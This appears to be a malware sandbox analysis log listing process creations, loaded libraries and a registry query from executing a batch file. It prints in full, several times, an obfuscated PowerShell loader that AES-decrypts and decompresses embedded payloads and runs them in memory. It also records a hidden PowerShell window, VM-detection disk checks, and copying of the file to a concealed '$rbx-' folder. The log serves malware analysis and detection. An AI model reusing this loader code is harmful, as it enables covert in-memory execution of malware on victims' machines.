Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\spoolsv.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

